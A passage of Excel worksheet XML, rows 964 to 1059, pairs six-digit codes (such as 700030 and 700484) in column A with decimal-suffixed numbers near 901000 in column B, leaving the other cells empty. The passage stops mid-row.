    <row r="964" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A964" s="5">
        <v>700030</v>
      </c>
      <c r="B964" s="3">
        <v>901003.005</v>
      </c>
      <c r="D964" s="5"/>
      <c r="E964" s="3"/>
      <c r="F964" s="1"/>
      <c r="H964" s="1"/>
    </row>
    <row r="965" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A965" s="5">
        <v>700030</v>
      </c>
      <c r="B965" s="3">
        <v>901057</v>
      </c>
      <c r="D965" s="5"/>
      <c r="E965" s="3"/>
      <c r="F965" s="1"/>
      <c r="H965" s="1"/>
    </row>
    <row r="966" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A966" s="5">
        <v>700030</v>
      </c>
      <c r="B966" s="3">
        <v>901055.00199999998</v>
      </c>
      <c r="D966" s="5"/>
      <c r="E966" s="3"/>
      <c r="F966" s="1"/>
      <c r="H966" s="1"/>
    </row>
    <row r="967" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A967" s="5">
        <v>700030</v>
      </c>
      <c r="B967" s="3">
        <v>901012</v>
      </c>
      <c r="D967" s="5"/>
      <c r="E967" s="3"/>
      <c r="F967" s="1"/>
      <c r="H967" s="1"/>
    </row>
    <row r="968" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A968" s="5">
        <v>700030</v>
      </c>
      <c r="B968" s="3">
        <v>901219</v>
      </c>
      <c r="D968" s="5"/>
      <c r="E968" s="3"/>
      <c r="F968" s="1"/>
      <c r="H968" s="1"/>
    </row>
    <row r="969" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A969" s="5">
        <v>700030</v>
      </c>
      <c r="B969" s="3">
        <v>901021.00199999998</v>
      </c>
      <c r="D969" s="5"/>
      <c r="E969" s="3"/>
      <c r="F969" s="1"/>
      <c r="H969" s="1"/>
    </row>
    <row r="970" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A970" s="5">
        <v>700030</v>
      </c>
      <c r="B970" s="3">
        <v>901113</v>
      </c>
      <c r="D970" s="5"/>
      <c r="E970" s="3"/>
      <c r="F970" s="1"/>
      <c r="H970" s="1"/>
    </row>
    <row r="971" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A971" s="5">
        <v>700484</v>
      </c>
      <c r="B971" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D971" s="5"/>
      <c r="E971" s="3"/>
      <c r="F971" s="1"/>
      <c r="H971" s="1"/>
    </row>
    <row r="972" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A972" s="5">
        <v>700484</v>
      </c>
      <c r="B972" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D972" s="5"/>
      <c r="E972" s="3"/>
      <c r="F972" s="1"/>
      <c r="H972" s="1"/>
    </row>
    <row r="973" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A973" s="5">
        <v>700484</v>
      </c>
      <c r="B973" s="3">
        <v>901185</v>
      </c>
      <c r="D973" s="5"/>
      <c r="E973" s="3"/>
      <c r="F973" s="1"/>
      <c r="H973" s="1"/>
    </row>
    <row r="974" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A974" s="5">
        <v>700484</v>
      </c>
      <c r="B974" s="3">
        <v>901555</v>
      </c>
      <c r="D974" s="5"/>
      <c r="E974" s="3"/>
      <c r="F974" s="1"/>
      <c r="H974" s="1"/>
    </row>
    <row r="975" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A975" s="5">
        <v>700484</v>
      </c>
      <c r="B975" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D975" s="5"/>
      <c r="E975" s="3"/>
      <c r="F975" s="1"/>
      <c r="H975" s="1"/>
    </row>
    <row r="976" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A976" s="5">
        <v>700484</v>
      </c>
      <c r="B976" s="3">
        <v>901041</v>
      </c>
      <c r="D976" s="5"/>
      <c r="E976" s="3"/>
      <c r="F976" s="1"/>
      <c r="H976" s="1"/>
    </row>
    <row r="977" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A977" s="5">
        <v>700484</v>
      </c>
      <c r="B977" s="3">
        <v>901068</v>
      </c>
      <c r="D977" s="5"/>
      <c r="E977" s="3"/>
      <c r="F977" s="1"/>
      <c r="H977" s="1"/>
    </row>
    <row r="978" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A978" s="5">
        <v>700484</v>
      </c>
      <c r="B978" s="3">
        <v>901564.00100000005</v>
      </c>
      <c r="D978" s="5"/>
      <c r="E978" s="3"/>
      <c r="F978" s="1"/>
      <c r="H978" s="1"/>
    </row>
    <row r="979" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A979" s="5">
        <v>700484</v>
      </c>
      <c r="B979" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D979" s="5"/>
      <c r="E979" s="3"/>
      <c r="F979" s="1"/>
      <c r="H979" s="1"/>
    </row>
    <row r="980" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A980" s="5">
        <v>700484</v>
      </c>
      <c r="B980" s="3">
        <v>901105</v>
      </c>
      <c r="D980" s="5"/>
      <c r="E980" s="3"/>
      <c r="F980" s="1"/>
      <c r="H980" s="1"/>
    </row>
    <row r="981" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A981" s="5">
        <v>700484</v>
      </c>
      <c r="B981" s="3">
        <v>901056.00399999996</v>
      </c>
      <c r="D981" s="5"/>
      <c r="E981" s="3"/>
      <c r="F981" s="1"/>
      <c r="H981" s="1"/>
    </row>
    <row r="982" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A982" s="5">
        <v>700484</v>
      </c>
      <c r="B982" s="3">
        <v>901036.005</v>
      </c>
      <c r="D982" s="5"/>
      <c r="E982" s="3"/>
      <c r="F982" s="1"/>
      <c r="H982" s="1"/>
    </row>
    <row r="983" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A983" s="5">
        <v>700484</v>
      </c>
      <c r="B983" s="3">
        <v>901106</v>
      </c>
      <c r="D983" s="5"/>
      <c r="E983" s="3"/>
      <c r="F983" s="1"/>
      <c r="H983" s="1"/>
    </row>
    <row r="984" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A984" s="5">
        <v>700484</v>
      </c>
      <c r="B984" s="3">
        <v>901027</v>
      </c>
      <c r="D984" s="5"/>
      <c r="E984" s="3"/>
      <c r="F984" s="1"/>
      <c r="H984" s="1"/>
    </row>
    <row r="985" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A985" s="5">
        <v>700484</v>
      </c>
      <c r="B985" s="3">
        <v>901542.00300000003</v>
      </c>
      <c r="D985" s="5"/>
      <c r="E985" s="3"/>
      <c r="F985" s="1"/>
      <c r="H985" s="1"/>
    </row>
    <row r="986" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A986" s="5">
        <v>700484</v>
      </c>
      <c r="B986" s="3">
        <v>901507</v>
      </c>
      <c r="D986" s="5"/>
      <c r="E986" s="3"/>
      <c r="F986" s="1"/>
      <c r="H986" s="1"/>
    </row>
    <row r="987" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A987" s="5">
        <v>700484</v>
      </c>
      <c r="B987" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D987" s="5"/>
      <c r="E987" s="3"/>
      <c r="F987" s="1"/>
      <c r="H987" s="1"/>
    </row>
    <row r="988" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A988" s="5">
        <v>700484</v>
      </c>
      <c r="B988" s="3">
        <v>901055.00399999996</v>
      </c>
      <c r="D988" s="5"/>
      <c r="E988" s="3"/>
      <c r="F988" s="1"/>
      <c r="H988" s="1"/>
    </row>
    <row r="989" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A989" s="5">
        <v>700484</v>
      </c>
      <c r="B989" s="3">
        <v>901012</v>
      </c>
      <c r="D989" s="5"/>
      <c r="E989" s="3"/>
      <c r="F989" s="1"/>
      <c r="H989" s="1"/>
    </row>
    <row r="990" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A990" s="5">
        <v>700484</v>
      </c>
      <c r="B990" s="3">
        <v>901021.005</v>
      </c>
      <c r="D990" s="5"/>
      <c r="E990" s="3"/>
      <c r="F990" s="1"/>
      <c r="H990" s="1"/>
    </row>
    <row r="991" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A991" s="5">
        <v>700484</v>
      </c>
      <c r="B991" s="3">
        <v>901014</v>
      </c>
      <c r="D991" s="5"/>
      <c r="E991" s="3"/>
      <c r="F991" s="1"/>
      <c r="H991" s="1"/>
    </row>
    <row r="992" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A992" s="5">
        <v>700484</v>
      </c>
      <c r="B992" s="3">
        <v>901113</v>
      </c>
      <c r="D992" s="5"/>
      <c r="E992" s="3"/>
      <c r="F992" s="1"/>
      <c r="H992" s="1"/>
    </row>
    <row r="993" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A993" s="5">
        <v>700484</v>
      </c>
      <c r="B993" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D993" s="5"/>
      <c r="E993" s="3"/>
      <c r="F993" s="1"/>
      <c r="H993" s="1"/>
    </row>
    <row r="994" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A994" s="5">
        <v>700484</v>
      </c>
      <c r="B994" s="3">
        <v>901082</v>
      </c>
      <c r="D994" s="5"/>
      <c r="E994" s="3"/>
      <c r="F994" s="1"/>
      <c r="H994" s="1"/>
    </row>
    <row r="995" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A995" s="5">
        <v>700484</v>
      </c>
      <c r="B995" s="3">
        <v>901497</v>
      </c>
      <c r="D995" s="5"/>
      <c r="E995" s="3"/>
      <c r="F995" s="1"/>
      <c r="H995" s="1"/>
    </row>
    <row r="996" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A996" s="5">
        <v>700335</v>
      </c>
      <c r="B996" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D996" s="5"/>
      <c r="E996" s="3"/>
      <c r="F996" s="1"/>
      <c r="H996" s="1"/>
    </row>
    <row r="997" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A997" s="5">
        <v>700335</v>
      </c>
      <c r="B997" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D997" s="5"/>
      <c r="E997" s="3"/>
      <c r="F997" s="1"/>
      <c r="H997" s="1"/>
    </row>
    <row r="998" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A998" s="5">
        <v>700335</v>
      </c>
      <c r="B998" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D998" s="5"/>
      <c r="E998" s="3"/>
      <c r="F998" s="1"/>
      <c r="H998" s="1"/>
    </row>
    <row r="999" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A999" s="5">
        <v>700335</v>
      </c>
      <c r="B999" s="3">
        <v>901140</v>
      </c>
      <c r="D999" s="5"/>
      <c r="E999" s="3"/>
      <c r="F999" s="1"/>
      <c r="H999" s="1"/>
    </row>
    <row r="1000" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1000" s="5">
        <v>700335</v>
      </c>
      <c r="B1000" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D1000" s="5"/>
      <c r="E1000" s="3"/>
      <c r="F1000" s="1"/>
      <c r="H1000" s="1"/>
    </row>
    <row r="1001" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1001" s="5">
        <v>700335</v>
      </c>
      <c r="B1001" s="3">
        <v>901048.00300000003</v>
      </c>
      <c r="D1001" s="5"/>
      <c r="E1001" s="3"/>
      <c r="F1001" s="1"/>
      <c r="H1001" s="1"/>
    </row>
    <row r="1002" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1002" s="5">
        <v>700335</v>
      </c>
      <c r="B1002" s="3">
        <v>901095</v>
      </c>
      <c r="D1002" s="5"/>
      <c r="E1002" s="3"/>
      <c r="F1002" s="1"/>
      <c r="H1002" s="1"/>
    </row>
    <row r="1003" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1003" s="5">
        <v>700335</v>
      </c>
      <c r="B1003" s="3">
        <v>901027</v>
      </c>
      <c r="D1003" s="5"/>
      <c r="E1003" s="3"/>
      <c r="F1003" s="1"/>
      <c r="H1003" s="1"/>
    </row>
    <row r="1004" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1004" s="5">
        <v>700335</v>
      </c>
      <c r="B1004" s="3">
        <v>901069</v>
      </c>
      <c r="D1004" s="5"/>
      <c r="E1004" s="3"/>
      <c r="F1004" s="1"/>
      <c r="H1004" s="1"/>
    </row>
    <row r="1005" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1005" s="5">
        <v>700335</v>
      </c>
      <c r="B1005" s="3">
        <v>901057</v>
      </c>
      <c r="D1005" s="5"/>
      <c r="E1005" s="3"/>
      <c r="F1005" s="1"/>
      <c r="H1005" s="1"/>
    </row>
    <row r="1006" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1006" s="5">
        <v>700335</v>
      </c>
      <c r="B1006" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D1006" s="5"/>
      <c r="E1006" s="3"/>
      <c r="F1006" s="1"/>
      <c r="H1006" s="1"/>
    </row>
    <row r="1007" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1007" s="5">
        <v>700335</v>
      </c>
      <c r="B1007" s="3">
        <v>901012</v>
      </c>
      <c r="D1007" s="5"/>
      <c r="E1007" s="3"/>
      <c r="F1007" s="1"/>
      <c r="H1007" s="1"/>
    </row>
    <row r="1008" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1008" s="5">
        <v>700335</v>
      </c>
      <c r="B1008" s="3">
        <v>901018</v>
      </c>
      <c r="D1008" s="5"/>
      <c r="E1008" s="3"/>
      <c r="F1008" s="1"/>
      <c r="H1008" s="1"/>
    </row>
    <row r="1009" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1009" s="5">
        <v>700335</v>
      </c>
      <c r="B1009" s="3">
        <v>901053.005</v>
      </c>
      <c r="D1009" s="5"/>
      <c r="E1009" s="3"/>
      <c r="F1009" s="1"/>
      <c r="H1009" s="1"/>
    </row>
    <row r="1010" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1010" s="5">
        <v>700335</v>
      </c>
      <c r="B1010" s="3">
        <v>901016</v>
      </c>
      <c r="D1010" s="5"/>
      <c r="E1010" s="3"/>
      <c r="F1010" s="1"/>
      <c r="H1010" s="1"/>
    </row>
    <row r="1011" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1011" s="5">
        <v>700335</v>
      </c>
      <c r="B1011" s="3">
        <v>901049</v>
      </c>
      <c r="D1011" s="5"/>
      <c r="E1011" s="3"/>
      <c r="F1011" s="1"/>
      <c r="H1011" s="1"/>
    </row>
    <row r="1012" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1012" s="5">
        <v>700335</v>
      </c>
      <c r="B1012" s="3">
        <v>901124</v>
      </c>
      <c r="D1012" s="5"/>
      <c r="E1012" s="3"/>
      <c r="F1012" s="1"/>
      <c r="H1012" s="1"/>
    </row>
    <row r="1013" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1013" s="5">
        <v>700335</v>
      </c>
      <c r="B1013" s="3">
        <v>901102</v>
      </c>
      <c r="D1013" s="5"/>
      <c r="E1013" s="3"/>
      <c r="F1013" s="1"/>
      <c r="H1013" s="1"/>
    </row>
    <row r="1014" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1014" s="5">
        <v>700529</v>
      </c>
      <c r="B1014" s="3">
        <v>901409</v>
      </c>
      <c r="D1014" s="5"/>
      <c r="E1014" s="3"/>
      <c r="F1014" s="1"/>
      <c r="H1014" s="1"/>
    </row>
    <row r="1015" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1015" s="5">
        <v>700529</v>
      </c>
      <c r="B1015" s="3">
        <v>901438</v>
      </c>
      <c r="D1015" s="5"/>
      <c r="E1015" s="3"/>
      <c r="F1015" s="1"/>
      <c r="H1015" s="1"/>
    </row>
    <row r="1016" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1016" s="5">
        <v>700529</v>
      </c>
      <c r="B1016" s="3">
        <v>901418</v>
      </c>
      <c r="D1016" s="5"/>
      <c r="E1016" s="3"/>
      <c r="F1016" s="1"/>
      <c r="H1016" s="1"/>
    </row>
    <row r="1017" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1017" s="5">
        <v>700529</v>
      </c>
      <c r="B1017" s="3">
        <v>901616</v>
      </c>
      <c r="D1017" s="5"/>
      <c r="E1017" s="3"/>
      <c r="F1017" s="1"/>
      <c r="H1017" s="1"/>
    </row>
    <row r="1018" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1018" s="5">
        <v>700529</v>
      </c>
      <c r="B1018" s="3">
        <v>901429</v>
      </c>
      <c r="D1018" s="5"/>
      <c r="E1018" s="3"/>
      <c r="F1018" s="1"/>
      <c r="H1018" s="1"/>
    </row>
    <row r="1019" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1019" s="5">
        <v>700529</v>
      </c>
      <c r="B1019" s="3">
        <v>901412</v>
      </c>
      <c r="D1019" s="5"/>
      <c r="E1019" s="3"/>
      <c r="F1019" s="1"/>
      <c r="H1019" s="1"/>
    </row>
    <row r="1020" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1020" s="5">
        <v>700529</v>
      </c>
      <c r="B1020" s="3">
        <v>901447</v>
      </c>
      <c r="D1020" s="5"/>
      <c r="E1020" s="3"/>
      <c r="F1020" s="1"/>
      <c r="H1020" s="1"/>
    </row>
    <row r="1021" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1021" s="5">
        <v>700529</v>
      </c>
      <c r="B1021" s="3">
        <v>901407</v>
      </c>
      <c r="D1021" s="5"/>
      <c r="E1021" s="3"/>
      <c r="F1021" s="1"/>
      <c r="H1021" s="1"/>
    </row>
    <row r="1022" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1022" s="5">
        <v>700529</v>
      </c>
      <c r="B1022" s="3">
        <v>901420</v>
      </c>
      <c r="D1022" s="5"/>
      <c r="E1022" s="3"/>
      <c r="F1022" s="1"/>
      <c r="H1022" s="1"/>
    </row>
    <row r="1023" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1023" s="5">
        <v>700529</v>
      </c>
      <c r="B1023" s="3">
        <v>901430</v>
      </c>
      <c r="D1023" s="5"/>
      <c r="E1023" s="3"/>
      <c r="F1023" s="1"/>
      <c r="H1023" s="1"/>
    </row>
    <row r="1024" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1024" s="5">
        <v>700529</v>
      </c>
      <c r="B1024" s="3">
        <v>901444</v>
      </c>
      <c r="D1024" s="5"/>
      <c r="E1024" s="3"/>
      <c r="F1024" s="1"/>
      <c r="H1024" s="1"/>
    </row>
    <row r="1025" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1025" s="5">
        <v>700529</v>
      </c>
      <c r="B1025" s="3">
        <v>901575</v>
      </c>
      <c r="D1025" s="5"/>
      <c r="E1025" s="3"/>
      <c r="F1025" s="1"/>
      <c r="H1025" s="1"/>
    </row>
    <row r="1026" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1026" s="5">
        <v>700529</v>
      </c>
      <c r="B1026" s="3">
        <v>901406</v>
      </c>
      <c r="D1026" s="5"/>
      <c r="E1026" s="3"/>
      <c r="F1026" s="1"/>
      <c r="H1026" s="1"/>
    </row>
    <row r="1027" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1027" s="5">
        <v>700529</v>
      </c>
      <c r="B1027" s="3">
        <v>901521</v>
      </c>
      <c r="D1027" s="5"/>
      <c r="E1027" s="3"/>
      <c r="F1027" s="1"/>
      <c r="H1027" s="1"/>
    </row>
    <row r="1028" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1028" s="5">
        <v>700529</v>
      </c>
      <c r="B1028" s="3">
        <v>901426</v>
      </c>
      <c r="D1028" s="5"/>
      <c r="E1028" s="3"/>
      <c r="F1028" s="1"/>
      <c r="H1028" s="1"/>
    </row>
    <row r="1029" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1029" s="5">
        <v>700529</v>
      </c>
      <c r="B1029" s="3">
        <v>901422</v>
      </c>
      <c r="D1029" s="5"/>
      <c r="E1029" s="3"/>
      <c r="F1029" s="1"/>
      <c r="H1029" s="1"/>
    </row>
    <row r="1030" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1030" s="5">
        <v>700348</v>
      </c>
      <c r="B1030" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D1030" s="5"/>
      <c r="E1030" s="3"/>
      <c r="F1030" s="1"/>
      <c r="H1030" s="1"/>
    </row>
    <row r="1031" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1031" s="5">
        <v>700348</v>
      </c>
      <c r="B1031" s="3">
        <v>901560.00199999998</v>
      </c>
      <c r="D1031" s="5"/>
      <c r="E1031" s="3"/>
      <c r="F1031" s="1"/>
      <c r="H1031" s="1"/>
    </row>
    <row r="1032" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1032" s="5">
        <v>700348</v>
      </c>
      <c r="B1032" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D1032" s="5"/>
      <c r="E1032" s="3"/>
      <c r="F1032" s="1"/>
      <c r="H1032" s="1"/>
    </row>
    <row r="1033" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1033" s="5">
        <v>700348</v>
      </c>
      <c r="B1033" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D1033" s="5"/>
      <c r="E1033" s="3"/>
      <c r="F1033" s="1"/>
      <c r="H1033" s="1"/>
    </row>
    <row r="1034" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1034" s="5">
        <v>700348</v>
      </c>
      <c r="B1034" s="3">
        <v>901140</v>
      </c>
      <c r="D1034" s="5"/>
      <c r="E1034" s="3"/>
      <c r="F1034" s="1"/>
      <c r="H1034" s="1"/>
    </row>
    <row r="1035" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1035" s="5">
        <v>700348</v>
      </c>
      <c r="B1035" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D1035" s="5"/>
      <c r="E1035" s="3"/>
      <c r="F1035" s="1"/>
      <c r="H1035" s="1"/>
    </row>
    <row r="1036" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1036" s="5">
        <v>700348</v>
      </c>
      <c r="B1036" s="3">
        <v>901008</v>
      </c>
      <c r="D1036" s="5"/>
      <c r="E1036" s="3"/>
      <c r="F1036" s="1"/>
      <c r="H1036" s="1"/>
    </row>
    <row r="1037" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1037" s="5">
        <v>700348</v>
      </c>
      <c r="B1037" s="3">
        <v>901083</v>
      </c>
      <c r="D1037" s="5"/>
      <c r="E1037" s="3"/>
      <c r="F1037" s="1"/>
      <c r="H1037" s="1"/>
    </row>
    <row r="1038" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1038" s="5">
        <v>700348</v>
      </c>
      <c r="B1038" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D1038" s="5"/>
      <c r="E1038" s="3"/>
      <c r="F1038" s="1"/>
      <c r="H1038" s="1"/>
    </row>
    <row r="1039" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1039" s="5">
        <v>700348</v>
      </c>
      <c r="B1039" s="3">
        <v>901105</v>
      </c>
      <c r="D1039" s="5"/>
      <c r="E1039" s="3"/>
      <c r="F1039" s="1"/>
      <c r="H1039" s="1"/>
    </row>
    <row r="1040" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1040" s="5">
        <v>700348</v>
      </c>
      <c r="B1040" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D1040" s="5"/>
      <c r="E1040" s="3"/>
      <c r="F1040" s="1"/>
      <c r="H1040" s="1"/>
    </row>
    <row r="1041" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1041" s="5">
        <v>700348</v>
      </c>
      <c r="B1041" s="3">
        <v>901112</v>
      </c>
      <c r="D1041" s="5"/>
      <c r="E1041" s="3"/>
      <c r="F1041" s="1"/>
      <c r="H1041" s="1"/>
    </row>
    <row r="1042" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1042" s="5">
        <v>700348</v>
      </c>
      <c r="B1042" s="3">
        <v>901027</v>
      </c>
      <c r="D1042" s="5"/>
      <c r="E1042" s="3"/>
      <c r="F1042" s="1"/>
      <c r="H1042" s="1"/>
    </row>
    <row r="1043" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1043" s="5">
        <v>700348</v>
      </c>
      <c r="B1043" s="3">
        <v>901027.00399999996</v>
      </c>
      <c r="D1043" s="5"/>
      <c r="E1043" s="3"/>
      <c r="F1043" s="1"/>
      <c r="H1043" s="1"/>
    </row>
    <row r="1044" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1044" s="5">
        <v>700348</v>
      </c>
      <c r="B1044" s="3">
        <v>901057</v>
      </c>
      <c r="D1044" s="5"/>
      <c r="E1044" s="3"/>
      <c r="F1044" s="1"/>
      <c r="H1044" s="1"/>
    </row>
    <row r="1045" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1045" s="5">
        <v>700348</v>
      </c>
      <c r="B1045" s="3">
        <v>901055</v>
      </c>
      <c r="D1045" s="5"/>
      <c r="E1045" s="3"/>
      <c r="F1045" s="1"/>
      <c r="H1045" s="1"/>
    </row>
    <row r="1046" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1046" s="5">
        <v>700348</v>
      </c>
      <c r="B1046" s="3">
        <v>901090</v>
      </c>
      <c r="D1046" s="5"/>
      <c r="E1046" s="3"/>
      <c r="F1046" s="1"/>
      <c r="H1046" s="1"/>
    </row>
    <row r="1047" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1047" s="5">
        <v>700348</v>
      </c>
      <c r="B1047" s="3">
        <v>901012</v>
      </c>
      <c r="D1047" s="5"/>
      <c r="E1047" s="3"/>
      <c r="F1047" s="1"/>
      <c r="H1047" s="1"/>
    </row>
    <row r="1048" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1048" s="5">
        <v>700348</v>
      </c>
      <c r="B1048" s="3">
        <v>901113</v>
      </c>
      <c r="D1048" s="5"/>
      <c r="E1048" s="3"/>
      <c r="F1048" s="1"/>
      <c r="H1048" s="1"/>
    </row>
    <row r="1049" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1049" s="5">
        <v>700348</v>
      </c>
      <c r="B1049" s="3">
        <v>901082</v>
      </c>
      <c r="D1049" s="5"/>
      <c r="E1049" s="3"/>
      <c r="F1049" s="1"/>
      <c r="H1049" s="1"/>
    </row>
    <row r="1050" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1050" s="5">
        <v>700348</v>
      </c>
      <c r="B1050" s="3">
        <v>901033</v>
      </c>
      <c r="D1050" s="5"/>
      <c r="E1050" s="3"/>
      <c r="F1050" s="1"/>
      <c r="H1050" s="1"/>
    </row>
    <row r="1051" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1051" s="5">
        <v>700348</v>
      </c>
      <c r="B1051" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D1051" s="5"/>
      <c r="E1051" s="3"/>
      <c r="F1051" s="1"/>
      <c r="H1051" s="1"/>
    </row>
    <row r="1052" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1052" s="5">
        <v>700465</v>
      </c>
      <c r="B1052" s="3">
        <v>901071.00199999998</v>
      </c>
      <c r="D1052" s="5"/>
      <c r="E1052" s="3"/>
      <c r="F1052" s="1"/>
      <c r="H1052" s="1"/>
    </row>
    <row r="1053" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1053" s="5">
        <v>700465</v>
      </c>
      <c r="B1053" s="3">
        <v>901027</v>
      </c>
      <c r="D1053" s="5"/>
      <c r="E1053" s="3"/>
      <c r="F1053" s="1"/>
      <c r="H1053" s="1"/>
    </row>
    <row r="1054" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1054" s="5">
        <v>700465</v>
      </c>
      <c r="B1054" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D1054" s="5"/>
      <c r="E1054" s="3"/>
      <c r="F1054" s="1"/>
      <c r="H1054" s="1"/>
    </row>
    <row r="1055" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1055" s="5">
        <v>700462</v>
      </c>
      <c r="B1055" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D1055" s="5"/>
      <c r="E1055" s="3"/>
      <c r="F1055" s="1"/>
      <c r="H1055" s="1"/>
    </row>
    <row r="1056" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1056" s="5">
        <v>700462</v>
      </c>
      <c r="B1056" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D1056" s="5"/>
      <c r="E1056" s="3"/>
      <c r="F1056" s="1"/>
      <c r="H1056" s="1"/>
    </row>
    <row r="1057" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1057" s="5">
        <v>700462</v>
      </c>
      <c r="B1057" s="3">
        <v>901105</v>
      </c>
      <c r="D1057" s="5"/>
      <c r="E1057" s="3"/>
      <c r="F1057" s="1"/>
      <c r="H1057" s="1"/>
    </row>
    <row r="1058" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1058" s="5">
        <v>700462</v>
      </c>
      <c r="B1058" s="3">
        <v>901027</v>
      </c>
      <c r="D1058" s="5"/>
      <c r="E1058" s="3"/>
      <c r="F1058" s="1"/>
      <c r="H1058" s="1"/>
    </row>
    <row r="1059" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1059" s="5">
        <v>700462</v>
      </c>
      <c r="B1059" s="3">
